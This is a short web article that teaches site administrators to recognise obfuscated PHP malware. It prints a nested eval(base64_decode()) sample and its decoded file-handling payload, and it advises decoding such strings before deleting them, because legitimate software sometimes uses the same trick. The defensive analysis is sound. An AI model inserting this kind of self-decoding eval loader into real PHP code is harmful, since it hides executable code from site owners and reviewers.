In this article we want to show you some examples of malware code. Sometimes it is easy to decide, whether a part of code is malicious, sometimes it's not.
Malware with eval and base64_decode
This form of malware is one of the widest-spread types out there. It is easy to find code like this when looking at your php files.
<?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSdE5XbE5ibEp3VmpCYVlXUXhaSE5VYTBwUVZsZDRTVll5TlVOaFZrbDRWMjB4V0dGcmNGaFVWVnB1WlZaU2RWZHRiR2xpUlhCNlYxY3dNVlV5Vm5Ka1JWSmFUVEZ3Y2xWdWNFZE5NVkpKWVhwR2FWWXdiRFpXYlRWWFdWWkdObUpFUWxoV2JWSnlXV3RrVDJSV1RuVlhiWEJvVmtaV00xZHNWbTlWYlVweVpVVlNVbUV5VWxWV2JHaHZVakZrUlZKc1pGZFNhM0JZVkRGV2QxWlhSWGRPVlRWWFlrWmFWRlZ0ZUc1bFJrWnlVMnhrVTFZeVVqTldSRTVyWkRKS1IyRXpiR2hUUm5CTFZWUkdTMDFHY0VkYVNFNXBVbGQ0UlZSclpITlhWa28yVlc1Q1ZVMHlVak5VVm1STFpFZFdTVkZ0YkdsWFJUVXlWVEkxY2s1Vk1VaFRiR3hTVjBad1RsbHNXbmROYkhCSFdYcEdhRTFJWkRWVVZtUnZXVlV4YzFkcVZscE5ha0V4V2xaV05HUldWbkZWYlhSU1RXczFNMVpFVG10a2JVVjVVMnhzYVZJeGNIRlVWelZ2VFd4a1dFMUVWazloTW5oR1ZGVmthMU15VmxWaE0yUmFZa2RvUTFwSGREUmtSbVIxVjIxMFYyVnNXbmxXUlZKS1pVZEdSMkl6YkZkaWJYaHhXV3hTYzA1V1VraE9WazVQVWpGS1JWZFljR3RT.UjBaWFUyNWFXRlp0VFhoWlZFcExVMFphV0ZwR1JsWk5SWEF3VjFkd1QxRXlTa2hUYmtKaFRXNVNjRll3WkRSaVZtdzJVMnBTYTJKSGVEQlVNVkpoVkZaRmQxSnVWbUZUUjNoeFdUQldjMU5GT1ZsaVJYQlRUVlZ3TTFZeWVFOWliVXB6WTBac1ZHSnRlSEJVVkVKeVRXeE9WbFJyU21saE0yaDNWbGMxVTJKR1duRmlSRnBhWVRKTk1WbFdaRXBsYlVsNlVXeENiRlpWV1hsV1JWSktaVWRHU0ZKWWJGZFdNbEp3V1d4YVdtVnNUbFphUjBacS5VakJ3U1Zac1ZqQlNSbkExWVROQ1VHUjVhM0JQZHlrcE93KSk7)); ?>
Okay, that looks weired. If you run a base64_decrypt on the string, you get an eval(base64_decode()) again. So let's have a look at what's hidden inside this malware code.
$muie = file_get_contents('/tmp/.found/magerror.txt', FILE_USE_INCLUDE_PATH);
echo $muie ."\n";
unlink('/tmp/.found/magerror.txt');
$my_sloboz = '/tmp/.found/magerror.txt';
$handle = fopen($my_sloboz, 'w') or die('error: '.$my_sloboz); //make new file
This specific malware doesn't do any harm itself, but you get the point: There could be any code hidden in the base64 string.
So you might say: »Great! So I can delete all those eval(base64_decode()) crap!«
We wish it would be that easy, but sorry. There are lots of people out there that try to protect their code by »encrypting« it this way. Some of it just outputs a copyright notice, other creates a function that's needed by the software. You'll have to decode the string to know if it is really malware.
BEWARE! Never execute such code without checking it first!
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.